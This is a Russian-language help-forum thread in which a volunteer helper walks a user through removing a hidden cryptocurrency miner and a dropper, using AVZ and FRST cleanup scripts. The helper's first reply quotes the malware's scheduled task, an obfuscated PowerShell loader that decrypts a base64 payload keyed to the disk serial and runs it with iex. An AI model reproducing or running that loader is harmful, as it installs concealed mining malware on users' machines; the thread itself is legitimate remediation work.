Страница 1 из 2 12 Последняя
Показано с 1 по 20 из 23.

Тормозит компьютер когда не включен диспетчер задач. [not-a-virus:HEUR:RiskTool.Win32.BitMiner.gen] (заявка № 220759)

  1. #1
    Junior Member Репутация
    Регистрация
    01.11.2018
    Сообщений
    13
    Вес репутации
    26

    Тормозит компьютер когда не включен диспетчер задач. [not-a-virus:HEUR:RiskTool.Win32.BitMiner.gen]

    Доброго времени суток!
    В течении последних 3-5 дней, спустя пару минут после запуска ПК, начинаются дикие лаги. Когда случилось впервые, дабы посмотреть какой процесс все это устраивает, открыл диспетчер задач и, как по волшебству, все прекратилось. Так и работаю, с открытым диспетчером.
    Сканирование и лечение Авастом никак не помогло. Прошу помощи. Спасибо.
    Вложения Вложения
    Последний раз редактировалось UnBlaZer; 02.11.2018 в 14:13.

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,289
    Вес репутации
    384
    Уважаемый(ая) UnBlaZer, спасибо за обращение на наш форум!

    Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

    information

    Информация

    Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.





    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для SQ
    Регистрация
    18.05.2012
    Адрес
    Searching ...
    Сообщений
    12,843
    Вес репутации
    327
    Здравствуйте,

    HiJackThis (из каталога autologger)профиксить
    Важно: необходимо отметить и профиксить только то, что указано ниже.
    Код:
    O4 - HKU\.DEFAULT\..\Run: [GoogleUpdate] = C:\Windows\system32\config\systemprofile\AppData\Local\Google\Profile\service.exe  (file missing)
    O21 - HKLM\..\ShellIconOverlayIdentifiers\   OneDrive1: (no name) - {BBACC218-34EA-4666-9D7A-C78F2274A524} - (no file)
    O21 - HKLM\..\ShellIconOverlayIdentifiers\   OneDrive2: (no name) - {5AB7172C-9C11-405C-8DD5-AF20F3606282} - (no file)
    O21 - HKLM\..\ShellIconOverlayIdentifiers\   OneDrive3: (no name) - {A78ED123-AB77-406B-9962-2A5D9D2F7F30} - (no file)
    O21 - HKLM\..\ShellIconOverlayIdentifiers\   OneDrive4: (no name) - {F241C880-6982-4CE5-8CF7-7085BA96DA5A} - (no file)
    O21 - HKLM\..\ShellIconOverlayIdentifiers\   OneDrive5: (no name) - {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} - (no file)
    O21 - HKLM\..\ShellIconOverlayIdentifiers\   OneDrive6: (no name) - {9AA2F32D-362A-42D9-9328-24A483E2CCC3} - (no file)
    O21 - HKLM\..\ShellIconOverlayIdentifiers\GDriveSharedOverlay: (no name) - {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D43} - (no file)
    O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive1: (no name) - {BBACC218-34EA-4666-9D7A-C78F2274A524} - (no file)
    O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive2: (no name) - {5AB7172C-9C11-405C-8DD5-AF20F3606282} - (no file)
    O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive3: (no name) - {A78ED123-AB77-406B-9962-2A5D9D2F7F30} - (no file)
    O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive4: (no name) - {F241C880-6982-4CE5-8CF7-7085BA96DA5A} - (no file)
    O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive5: (no name) - {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} - (no file)
    O21-32 - HKLM\..\ShellIconOverlayIdentifiers\ OneDrive6: (no name) - {9AA2F32D-362A-42D9-9328-24A483E2CCC3} - (no file)
    O22 - Task: \Microsoft\Windows\Maintenance\WinDAT - C:\Windows\system32\cmd.exe /c dlhosts.exe || dlchosts.exe
    O22 - Task: \Microsoft\Windows\SoftwareProtectionPlatform\SoftwareProtectionPlatform - C:\Program Files\Windows NT\Accessories\task.exe -Command "$idd = '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';$u='ZnVuY3Rpb24gZGVjKFtieXRlW11dJGNiLCBbc3RyaW5nXSRwYXNzKXskcGIgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldEJ5dGVzKCRwYXNzKTskcyA9ICRwYlswXTskaj0wO2ZvcigkaSA9IDA7ICRpIC1sdCAkY2IuQ291bnQ7ICRpKyspe2lmKCRqIC1nZSAkcGIuQ291bnQpeyRqPTB9ICRzID0gKDIzIC1iYW5kICRzIC1ib3IgMTUyKSAtYnhvciAkczskY2JbJGldID0gJGNiWyRpXSAtYnhvciAkcGJbJGpdIC1ieG9yICRzOyRqKyt9cmV0dXJuICRjYjt9JG9iaiA9IGd3bWkgd2luMzJfZGlza2RyaXZlIHwgd2hlcmUgeyRfLkRldmljZUlEIC1lcSAnXFwuXFBIWVNJQ0FMRFJJVkUwJ30gfCBzZWxlY3QgTW9kZWwsIFNlcmlhbG51bWJlcjskZCA9IGRlYyAoW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkaWRkKSkgKCRvYmouTW9kZWwgKyAnICcgKyAkb2JqLlNlcmlhbG51bWJlcik7aWV4IChpZXgoJ1tTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0JysnU3RyaW5nKCRkKScpKQ==';iex (iex('[System.Text.Encoding]::U'+'TF'+4*2+'.Get'+'String([System.Convert]::From'+'Base64String($'+'u))'))" (Microsoft)

    AVZ выполнить следующий скрипт.
    Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.
    Код:
    begin
    ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
    ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); 
    if not IsWOW64
     then
      begin
       SearchRootkit(true, true);
       SetAVZGuardStatus(True);
      end;
     QuarantineFile('C:\ProgramData\Driverupdater\data\dvu.exe','');
     QuarantineFile('dlhosts.exe','');
     QuarantineFile('C:\Windows\system32\config\systemprofile\AppData\Local\Google\Profile\service.exe','');
     QuarantineFileF('C:\Windows\system32\config\systemprofile\AppData\Local\Google\Profile', '*.exe,*.dll,*.sys', false,'', 0, 0);
     RegKeyParamDel('HKEY_USERS','S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run','GoogleUpdate');
     DeleteFile('C:\Windows\system32\config\systemprofile\AppData\Local\Google\Profile\service.exe','32');
     DeleteFile('C:\Windows\system32\Tasks\Microsoft\Windows\SoftwareProtectionPlatform\SoftwareProtectionPlatform','64');
     ExecuteFile('schtasks.exe', '/delete /TN "Microsoft\Windows\SoftwareProtectionPlatform\SoftwareProtectionPlatform" /F', 0, 15000, true); 
    BC_ImportAll;
    ExecuteSysClean;
    BC_Activate;
    RebootWindows(false);
    end.
    После выполнения скрипта компьютер перезагрузится.

    После перезагрузки:
    - Выполните в AVZ:
    Код:
    begin
     CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); 
    end.
    Файл quarantine.zip из папки AVZ загрузите по ссылке "Прислать запрошенный карантин" вверху темы.

    - Подготовьте лог AdwCleaner и приложите его в теме.
    CCNA, CCNP, CCNA Security, CCDA, CCDP
    MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center

  5. Это понравилось:


  6. #4
    Junior Member Репутация
    Регистрация
    01.11.2018
    Сообщений
    13
    Вес репутации
    26
    Спасибо за оперативный ответ!
    Выполнил. Карантин загрузил. Лог добавил.

  7. #5
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для SQ
    Регистрация
    18.05.2012
    Адрес
    Searching ...
    Сообщений
    12,843
    Вес репутации
    327
    А где ранее запрошенный лог AdwCleaner?

    Найдена угроза:
    Код:
    C:\ProgramData\Driverupdater\data\dvu.exe -  Trojan-Dropper.Win32.Agent.sbnl
    AVZ выполнить следующий скрипт.
    Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.
    Код:
    begin
    ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
    ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); 
    if not IsWOW64
     then
      begin
       SearchRootkit(true, true);
       SetAVZGuardStatus(True);
      end;
     QuarantineFile('C:\ProgramData\Driverupdater\data\dvu.exe','');
     DeleteFile('C:\ProgramData\Driverupdater\data\dvu.exe','32');
    BC_ImportAll;
    ExecuteSysClean;
    BC_Activate;
    RebootWindows(true);
    end.
    После выполнения скрипта компьютер перезагрузится.
    CCNA, CCNP, CCNA Security, CCDA, CCDP
    MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center

  8. #6
    Junior Member Репутация
    Регистрация
    01.11.2018
    Сообщений
    13
    Вес репутации
    26
    Выполнил. Лог AdwCleaner закреплен в первом сообщении.
    Свежий прикрепляю тут.
    Вложения Вложения

  9. #7
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для SQ
    Регистрация
    18.05.2012
    Адрес
    Searching ...
    Сообщений
    12,843
    Вес репутации
    327
    Удалите в AdwCleaner всё, кроме папок с названиями программ которыми вы пользуетесь (если ничем из перечисленного в логе не пользуетесь, то удалите всё). Отчет после удаления прикрепите.
    CCNA, CCNP, CCNA Security, CCDA, CCDP
    MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center

  10. #8
    Junior Member Репутация
    Регистрация
    01.11.2018
    Сообщений
    13
    Вес репутации
    26
    Выполнил.
    Система работает исправно.
    Вложения Вложения

  11. #9
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для SQ
    Регистрация
    18.05.2012
    Адрес
    Searching ...
    Сообщений
    12,843
    Вес репутации
    327
    - Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

    Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
    • Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
    • Убедитесь, что в окне Optional Scan отмечены "List BCD" и "Driver MD5".
    • Нажмите кнопку Scan.
    • После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.
    • Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.
    CCNA, CCNP, CCNA Security, CCDA, CCDP
    MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center

  12. #10
    Junior Member Репутация
    Регистрация
    01.11.2018
    Сообщений
    13
    Вес репутации
    26
    Выполнено, прикрепил:
    Вложения Вложения

  13. #11
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для SQ
    Регистрация
    18.05.2012
    Адрес
    Searching ...
    Сообщений
    12,843
    Вес репутации
    327
    • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt с поддержкой Unicode в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
      Код:
      CreateRestorePoint:
      CloseProcesses:
      FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
      FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
      CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
      File: C:\Windows\GVTDrv64.sys 
      Folder: C:\ProgramData\Windows
      ContextMenuHandlers1_.DEFAULT: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} =>  -> No File
      ContextMenuHandlers4_.DEFAULT: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} =>  -> No File
      ContextMenuHandlers5_.DEFAULT: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} =>  -> No File
      Task: {D1A44E28-C82A-43D4-BA62-049E78F78042} - System32\Tasks\Driverupdater => C:\ProgramData\Driverupdater\data\dvu.exe
      C:\ProgramData\Driverupdater
      Reboot:
    • Запустите FRST и нажмите один раз на кнопку Fix и подождите.
    • Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
    • Обратите внимание, что компьютер будет перезагружен.
    CCNA, CCNP, CCNA Security, CCDA, CCDP
    MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center

  14. #12
    Junior Member Репутация
    Регистрация
    01.11.2018
    Сообщений
    13
    Вес репутации
    26
    Выполнил.
    Вложения Вложения

  15. #13
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для SQ
    Регистрация
    18.05.2012
    Адрес
    Searching ...
    Сообщений
    12,843
    Вес репутации
    327
    • Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt с поддержкой Unicode в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
      Код:
      CreateRestorePoint:
      Zip: C:\ProgramData\Windows
      C:\ProgramData\Windows
      Reboot:
    • Запустите FRST и нажмите один раз на кнопку Fix и подождите.
    • Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!


    На рабочем столе образуется карантин вида <date>.zip загрузите по ссылке "Прислать запрошенный карантин" вверху темы.
    CCNA, CCNP, CCNA Security, CCDA, CCDP
    MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center

  16. #14
    Junior Member Репутация
    Регистрация
    01.11.2018
    Сообщений
    13
    Вес репутации
    26
    Сделано, карантин загружен.

  17. #15
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для SQ
    Регистрация
    18.05.2012
    Адрес
    Searching ...
    Сообщений
    12,843
    Вес репутации
    327
    Сообщите, что с проблемой?
    CCNA, CCNP, CCNA Security, CCDA, CCDP
    MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center

  18. #16
    Junior Member Репутация
    Регистрация
    01.11.2018
    Сообщений
    13
    Вес репутации
    26
    Проблема полностью устранена. Уже после первого же Вашего ответа с руководством к действию система работает стабильно.
    Огромное спасибо Вам лично! Ну и virusinfo отблагодарил через YM. Потрясающий сервис, жаль не нагуглил вас раньше. Буду всем рекомендовать.

  19. #17
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для SQ
    Регистрация
    18.05.2012
    Адрес
    Searching ...
    Сообщений
    12,843
    Вес репутации
    327
    В завершение:
    1.
    • Пожалуйста, запустите adwcleaner.exe
    • В меню Настройки - Удалить AdwCleaner - выберите Удалить.
    • Подтвердите удаление, нажав кнопку: Да.


    Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите.
    Компьютер перезагрузится.

    Остальные утилиты лечения и папки можно просто удалить.
    CCNA, CCNP, CCNA Security, CCDA, CCDP
    MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center

  20. Это понравилось:


  21. #18
    Junior Member Репутация
    Регистрация
    01.11.2018
    Сообщений
    13
    Вес репутации
    26
    Выполнил. Еще раз спасибо!

  22. #19
    Senior Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для SQ
    Регистрация
    18.05.2012
    Адрес
    Searching ...
    Сообщений
    12,843
    Вес репутации
    327
    Здравствуйте,

    Могли бы выполнить еще следующие инструции, появилось предположение, что пропустили эту вредоносную exe:

    AVZ выполнить следующий скрипт.
    Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.
    Код:
    begin
    ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.');
    ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); 
    if not IsWOW64
     then
      begin
       SearchRootkit(true, true);
       SetAVZGuardStatus(True);
      end;
     QuarantineFile('C:\Program Files\Windows NT\Accessories\task.exe','');
     DeleteFile('C:\Program Files\Windows NT\Accessories\task.exe','32');
    BC_ImportAll;
    ExecuteSysClean;
    BC_Activate;
    RebootWindows(true);
    end.
    После выполнения скрипта компьютер перезагрузится.

    После перезагрузки:
    - Выполните в AVZ:
    Код:
    begin
     CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); 
    end.
    Файл quarantine.zip из папки AVZ загрузите по ссылке "Прислать запрошенный карантин" вверху темы.

    Могли бы также пожалуйста предоставить результат следующей команды в Powershell:
    Код:
    $obj = gwmi win32_diskdrive | where {$_.DeviceID -eq '\\.\PHYSICALDRIVE0'} | select Model, Serialnumber;
    $obj.Model + ' ' + $obj.Serialnumber;
    CCNA, CCNP, CCNA Security, CCDA, CCDP
    MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center

  23. #20
    Junior Member Репутация
    Регистрация
    01.11.2018
    Сообщений
    13
    Вес репутации
    26
    Не дает загрузить карантин. Выдается сообщение: Ошибка. Данный файл уже был загружен.
    Не знаю, в каком формате присылать результат команды Powershell, прикрепляю копипаст в txt
    Вложения Вложения

  • Уважаемый(ая) UnBlaZer, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Страница 1 из 2 12 Последняя

    Похожие темы

    1. Ответов: 5
      Последнее сообщение: 07.10.2018, 11:13
    2. Ответов: 2
      Последнее сообщение: 27.09.2018, 07:10
    3. Ответов: 2
      Последнее сообщение: 26.05.2014, 15:49
    4. Лагает компьютер, пока не включишь диспетчер задач
      От Александр Раздватри в разделе Помогите!
      Ответов: 7
      Последнее сообщение: 09.02.2014, 22:01
    5. Ответов: 7
      Последнее сообщение: 09.02.2014, 19:58

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.00924 seconds with 19 queries